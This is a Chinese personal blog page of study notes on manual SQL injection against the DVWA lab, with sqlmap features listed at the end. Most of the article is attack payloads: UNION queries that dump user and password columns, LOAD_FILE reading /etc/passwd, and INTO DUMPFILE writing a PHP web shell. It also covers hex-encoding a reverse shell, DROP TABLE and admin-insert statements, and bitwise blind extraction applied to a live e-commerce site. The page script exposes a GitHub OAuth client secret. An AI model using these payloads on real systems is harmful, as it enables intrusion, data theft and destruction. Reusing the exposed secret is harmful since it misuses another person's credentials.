<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="masterhui">
    
    
    
    
    
    
    <title>SQL-注入 | 且随疾风前行</title>
    <link href="”http://148.70.147.195/index.html“" rel="”prefetch”">

    <link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">
    <script src="/js/jquery.min.js"></script>
    <script src="/js/bootstrap.min.js"></script>
    <script src="/js/aos.js"></script>
    <script src="/js/highslide/highslide-full.min.js"></script>
    <link rel="stylesheet" href="/js/highslide/highslide.css">
    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg,preview5.jpg,preview6.jpg,preview7.jpg,preview8.jpg,preview9.jpg,preview10.jpg,preview11.jpg,preview12.jpg,preview13.jpg,preview14.jpg,preview15.jpg,preview16.jpg,preview17.jpg,preview18.jpg,preview19.jpg,preview20.jpg,preview21.jpg,preview22.jpg,preview23.jpg,preview24.jpg,preview25.jpg,preview26.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
</head></html>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <div class="gal-menu gal-dropdown">
    <div class="circle" id="gal">
        <div class="ring">
            <a href="http://148.70.147.195/index.html" class="menuItem" style="left: 50%; top: 15%;">首页</a>
            
            <a class="menuItem" style="left: 80.3109%; top: 32.5%;">下一页</a>
            
            <a href="/archives" class="menuItem" style="left: 80.3109%; top: 67.5%;">归档</a>
            <a href="/about" class="menuItem" style="left: 50%; top: 85%;">关于</a>
            <a href="/message" class="menuItem" style="left: 19.6891%; top: 67.5%;">留言板</a>
            
            <a class="menuItem" style="left: 19.6891%; top: 32.5%;">上一页</a>
            
        </div>
        <audio id="audio" src="/imgs/oni.mp3"></audio>
    </div>
</div>
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".bs-navbar-collapse" aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://148.70.147.195/index.html">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">等风</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="current">
                    <a href="/index.html">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class>
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class>
                    <a href="/categories">
                        <i class="fa fa-list"></i>分类
                    </a>
                </li>
                
                
                
                
                
                <li class>
                    <a href="/tags">
                        <i class="fa fa-tags"></i>标签
                    </a>
                </li>
                
                
                
                
                <li class>
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://148.70.147.195/index.html">且随疾风前行</a>
        >
        <span>SQL-注入</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2019/03/19/SQL-注入/">SQL-注入</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2019-03-19
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2019/03/19/SQL-注入/">SQL-注入</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2019-03-19
            </p>
            <p>
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h3 id="手动漏洞挖掘-sql注入"><a href="#手动漏洞挖掘-sql注入" class="headerlink" title="手动漏洞挖掘-sql注入"></a>手动漏洞挖掘-sql注入</h3><p>服务器端程序将用户输入参数作为查询条件，直接拼接SQl语句并将查询结果返回给客户浏览器</p>
<hr>
<h4 id="用户登录判断"><a href="#用户登录判断" class="headerlink" title="用户登录判断"></a>用户登录判断</h4><p>·SELECT<em>FROM users WHERE user= ‘uname ‘ AND password=’pass’<br>·SELECT</em>FROM users WHERE user=’name’ AND password=’’ OR ‘’=’’<br>·基于报错的检测方法<br>·  ‘  % （）<br>·基于布尔的检测方法<br>1 ‘ and  ‘1 ‘= ‘1       /       1 ‘ and  ‘1<br>1 ‘and ‘1 ‘= ‘2         /        1 ‘and ‘0<br>判断查询字段并搞清楚位置表列数<br> ‘order by 9–                   #按查询列号排序<br>·  select + 时刻字段数=查询字段数<br>· 联合查询（多条查询语句同时执行）<br>·  ‘union select 1.2–<br>· ·union all select database().2–<br>DB用户 ： user（）<br>DB版本 ;   version()<br>‘union select databnase() , substring_index(user(),”@”,1)#（把查询函数切分）<br>全局函数 ： @@datadir（当前数据库所在位置），@@hostname（主机名）,@@VERSION，@@VERSION_compile_os （操作系统版本）<br>当前库： database()<br>·ASCLL转字符：char()                  分隔<br>链接字符串：CONCAT_WS(CHAR(32,58,32),user(),database(),version())<br>计算哈希：md5()</p>
<hr>
<h4 id="Mysql-数据结构"><a href="#Mysql-数据结构" class="headerlink" title="Mysql 数据结构"></a>Mysql 数据结构</h4><p>·information_schema<br>·所有库所有表/统计每库中表的数量<br>union select table_name,table_schema,from information_schema.tables#（查所有表）<br>UNION select table schema.count() FROM information_Schema.tables group by table_schema#（查表名）</p>
<hr>
<h4 id="Dvwa库中的表名"><a href="#Dvwa库中的表名" class="headerlink" title="Dvwa库中的表名"></a>Dvwa库中的表名</h4><p>·union select table_name,column_name from information_schema.columns where table_schema=’dvwa’ and table_name=’users’#(按表名查询)</p>
<hr>
<h4 id="查询user-password-列的内容"><a href="#查询user-password-列的内容" class="headerlink" title="查询user,password 列的内容"></a>查询user,password 列的内容</h4><p>·union select user,password from dvwa.users#<br>·union select user,password from users#<br>·union select null,CONCAT(user(),0x3a,password) from users#</p>
<hr>
<h4 id="破解MD5"><a href="#破解MD5" class="headerlink" title="破解MD5"></a>破解MD5</h4><p>username:passhas——–&gt;hashtest<br>john –format=raw-MD5 hashtest –shou<br>sqlmap -d “mysql://root:@192.168.177.129:3306/dvwa” -a</p>
<hr>
<h3 id="读写文件和下载数据库"><a href="#读写文件和下载数据库" class="headerlink" title="读写文件和下载数据库"></a>读写文件和下载数据库</h3><h4 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h4><p>‘union select null,LOAD_file(‘/etc/passwd’)#</p>
<hr>
<h4 id="写入文件"><a href="#写入文件" class="headerlink" title="写入文件"></a>写入文件</h4><blockquote>
<p>‘union select null,”&lt;?php passthtu  $_ GET[‘cmd’]);?&gt;”INTO DUMPFILE”/var/www/a.php<br>可能会出发过滤机制<br>用16进制编码<br>kali实操拷贝一个反弹shell<br>cp /usr/share/webshell/php/ →reverse-shell.php/b.php<br>vi b.php 把ip改成目标ip 对b.php编码<br>cat b.php | xxd &lt;–(16进制编码) -ps<br>（会以固定长度编译，换行符mysql无法理解）用| tr -d ‘\n’<br>复制下编码内容注入到语句中去（0x编码内容）<br>·Mysql账号<br>cat php-revers-shell.php|xxd -ps | tr -d ‘\n’(反弹shell)</p>
</blockquote>
<hr>
<h4 id="保存下载数据库"><a href="#保存下载数据库" class="headerlink" title="保存下载数据库"></a>保存下载数据库</h4><p>union select null,(0x3a,password) from users INTO OUTFILE’/tmp/a.db’#(脱库到目标服务器的本地目录，在通过url下载)</p>
<h4 id="一个思路：编写服务器代码"><a href="#一个思路：编写服务器代码" class="headerlink" title="一个思路：编写服务器代码"></a>一个思路：编写服务器代码</h4><p>举个例子：<br><img src="https://s2.ax1x.com/2019/03/19/AuGOAS.png" alt><br>（上传的webshell收到限制没什么用）<br>变换一个思路了解目标服务器结构等等，直接写一段代码执行命令<br>如上图可以创建一个表单添加一个用户<br>现在的加密破解难度极大，效率低，可以变通思路，直接更改数据库内容，或添加高权限管理员</p>
<blockquote>
<p>ps 建议在kali装上professional的burp suite</p>
</blockquote>
<p>当无权读取information_schema库 / 拒绝union、order by语句时</p>
<ol>
<li>猜列名： ‘ and column is mull#<br> ·Burpsuite 自动猜列名</li>
<li>猜当前表表名： ‘and table.user is null#</li>
<li>猜库里其他表名： ‘and (select*from table)&gt;0#</li>
<li>列表对应关系：’and users.user is null#</li>
<li>猜字段关系： ‘or user=’admin<pre><code>&apos;or user like &apos;%a%
</code></pre></li>
<li>猜账号对应密码：’or user=’admin’ and password=’密码<br>当数据可写</li>
</ol>
<blockquote>
<p>· ‘:updat user set user=’yuanfh’ where user=’admin<br>“;”可以并列多条数据库语句<br>· INSERT INTO users（’user_id’,’first name’,’last_name’,’）user’,’password’,’avatar)VALUES(‘35’,’fh’,’yuan’,’密码’,’OK’);#<br>‘;DROP TABLE users；#<br>xp_cmdshell/ 储存过程<br>·SQLi没有通用的方法，要领就是掌握原理，了解各种数据库特性</p>
</blockquote>
<h5 id="sql注入-DVWAmedium难度级别和high难度区分"><a href="#sql注入-DVWAmedium难度级别和high难度区分" class="headerlink" title="sql注入-DVWAmedium难度级别和high难度区分"></a>sql注入-DVWAmedium难度级别和high难度区分</h5><p><img src="https://s2.ax1x.com/2019/03/20/AKngEj.png" alt><img src="https://s2.ax1x.com/2019/03/20/AKna4I.png" alt><br>上面两张图就是medium和low的区别<br>mysql_real_escape_string()”在php5.5弃用”在php7.0删除此语句，代之以MysqlLi，PDO_MySQl<br>medium在low的基础上增加了一句过滤语句，是PHP的集成语句，能实现特殊字符的转译</p>
<blockquote>
<p>“\,’,”,\n,\r,\xla”<br>下面看一下high改动的代码<br><img src="https://s2.ax1x.com/2019/03/20/AKuJzV.png" alt="在添加一行删除\的代码"><br><img src="https://s2.ax1x.com/2019/03/20/AKuDiR.png" alt="检查输入的是否为数字拒绝其他输入"><br>一个数字检查就无法注入select语句了</p>
</blockquote>
<hr>
<h3 id="sql-盲注"><a href="#sql-盲注" class="headerlink" title="sql 盲注"></a>sql 盲注</h3><p>不显示数据库内建的报错信息<br>    ·内建的报错信息帮助开发人员发现和修复问题<br>    ·报错信息提供关于系统的大量有用信息<br>当程序员隐藏了数据库内建报错信息，替换为通用的错误提示，sql注入将无法依据报错信息判断注入语句的执行结果即盲注</p>
<p>思路：既然无法基于报错信息报错信息判断结果，基于逻辑真假的不同结果来判断<br>· 1’and 1=1#<br>· 1’and 1=2#<br>猜列名 ： 1’and table.user is not null#<br>猜库里其他表：1’and (select count() from table)&gt;0#<br>列对应关系 1’and users.user is not null#<br>猜字段内容：1’and user=’admin<br>           1’or user like ‘%a%<br>·猜账号对应密码：<br>         ·2’ or user=’admin’and password=’密码<br> ·burpsuit自动化猜解</p>
<h4 id="·打开脑洞，注入的方式多种多样"><a href="#·打开脑洞，注入的方式多种多样" class="headerlink" title="·打开脑洞，注入的方式多种多样"></a>·打开脑洞，注入的方式多种多样</h4><p>真实案例：某电商网站</p>
<blockquote>
<p><a href="http://1.1.1.1/goods.php?cnt&amp;goodsid=123" target="_blank" rel="noopener">http://1.1.1.1/goods.php?cnt&amp;goodsid=123</a><br>·and 1=1#   显示一包面巾纸<br>·and 1=2#   显示一包洗衣粉<br>工具未扫到漏洞，于是人工拼接了下列语句<br>——————————————————————————————↓截取第一个字符<br>  · 1’and ORD(MID((version()),1,1))&amp;1&gt;0#<br> 得到ASCLL码↑<em>↑从字符串截取\</em>↑查询版本信息<br>· CURRENT_USER()、DATABASE()<br>· MID(ColumName,Start[,Length])<br>·ORD(string)&amp;32 跟上的对应的字符的ascll码的32所在的位的值<br>1(128) 1(64) 1(32) 1(16) 1(8) 1(4) 1(2) 1(1)<br>依次查询就可以的到对应的ascll码进而得到所有信息.</p>
</blockquote>
<h3 id="SQLMAP自动注入"><a href="#SQLMAP自动注入" class="headerlink" title="SQLMAP自动注入"></a>SQLMAP自动注入</h3><blockquote>
<p>简介<br>    ·开源sql注入漏洞检测，利用工具<br>    ·检测动态页面中get/past参数、cookie、http头<br>    ·数据榨取<br>    ·文件系统访问<br>    ·操作系统命令执行<br>    ·引擎强大、特性丰富<br>    ·Xss漏洞检测</p>
</blockquote>
<blockquote>
<p>五种漏洞检测技术</p>
<ol>
<li>基于布尔的盲注检测。(详见手动注入)</li>
<li>基于时间的盲注检测。<br>· ‘and (select*from(select(sleep(20)))a)#<pre><code>↑等待20s再执行
</code></pre></li>
<li>基于错误的检测</li>
<li>基于UNION的联合查询检测<br>  ·适用于通过for循环直接输出联合查询结果，否则只显示第一项结果</li>
<li>基于堆叠的查询检测<br>·通过；堆叠多个查询语句<br>·适用于非slect的数据修改，删除操作<br>· 支持的数据库管理系统DBMS<br>·MySWQL，Oracle，PostgerSQL，Microft SQL，Server，Microsoft Access，IBM DB2，SQLite，Firebird，<br>Sybase，SAP MaxDB.</li>
</ol>
</blockquote>
<blockquote>
<p>其他特性<br> ·数据库直连  -d<br>         ·不通过SQL注入，指定身份认证信息，ip，端口<br> ·与Burp suit，Google 结合使用，支持政策表达式限定测试目标<br> ·Get，past，cookie，referer，User-Agent（随机或指定）<br>     ·cookie过期后自动处理Set-Cookie头，更新cookie信息<br> ·限速：最大开发 延迟发送<br> ·支持Basic，Digest，NTLM，CA身份认证<br> ·数据库版本，用户权限hash枚举和字典破解，暴力破解表列名称<br> ·文件上传下载，UDF，启动并执行储存过程，操作系统命令执行，访问windows注册表<br> ·与w3af，metaspolit集成结合使用，基于数据库服务进程提权和上传执行后门</p>
</blockquote>

    </div>
</article>


<div id="comments-template"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script>
	if(!window.commentConfig) {
      window.commentConfig = {}
      window.commentConfig.title = 'SQL-注入'
    }
</script>

                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get" action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            masterhui
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140" alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/31/hexo博客在自己服务器上的搭建/">hexo博客在自己服务器上的搭建</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/24/新的开始-爬虫/">新的开始--爬虫基础</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/23/参数表/">参数表</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/23/sqlmap自动注入/">sqlmap自动注入</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/SQL-注入/">SQL-注入</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第五天/">web安全入门第五天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第4天/">web安全入门第4天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第三天/">web安全入门第三天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/18/web安全入门第二天/">web安全入门第二天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/18/web安全入门第一天/">web安全入门第一天</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/31/hexo博客在自己服务器上的搭建/">hexo博客在自己服务器上的搭建</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/17/hello-world/">Hello World</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第4天/">web安全入门第4天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/18/web安全入门第一天/">web安全入门第一天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/18/web安全入门第二天/">web安全入门第二天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/23/sqlmap自动注入/">sqlmap自动注入</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第五天/">web安全入门第五天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/web安全入门第三天/">web安全入门第三天</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/19/SQL-注入/">SQL-注入</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2019/03/23/参数表/">参数表</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2019/03/19/SQL-注入/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2019/03/19/SQL-注入/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2019/03/19/SQL-注入/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">绅士导航♂</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://toorliuyinghui.github.io" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://www.bilibili.com" target="_blank">bilibili</a>
    </li>
    
    <li>
        <a href="https://www.ichunqiu.com/" target="_blank">ichunqiu</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 masterhui Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>
<script src="/js/activate-power-mode.js"></script>
<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '6'
    }
</script>
<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>

<script src="/js/oni.js"></script>



<script src="https://myau.moe/js/comment/gitment.browser.js"></script>
<script>
    if(window.commentConfig) {
      window.commentConfig.id = 'Tue Mar 19 2019 18:41:22 GMT+0800'
      window.commentConfig.owner = 'toorliuyinghui'
      window.commentConfig.repo = 'toorliuyinghui'
      window.commentConfig.client_id = '1fe6b70d988456916089'
      window.commentConfig.client_secret = 'f1297df96159f9e0cf4b12220960949fb2b5837e'
      window.commentConfig.redirect_uri = ''
    } else {
      window.commentConfig = {
      	id: 'Tue Mar 19 2019 18:41:22 GMT+0800',
        owner: 'toorliuyinghui',
        repo: 'toorliuyinghui',
        client_id: '1fe6b70d988456916089',
        client_secret: 'f1297df96159f9e0cf4b12220960949fb2b5837e',
        redirect_uri: ''
      }
    }
</script>
<script src="/js/comment/gitment.js"></script>

</html>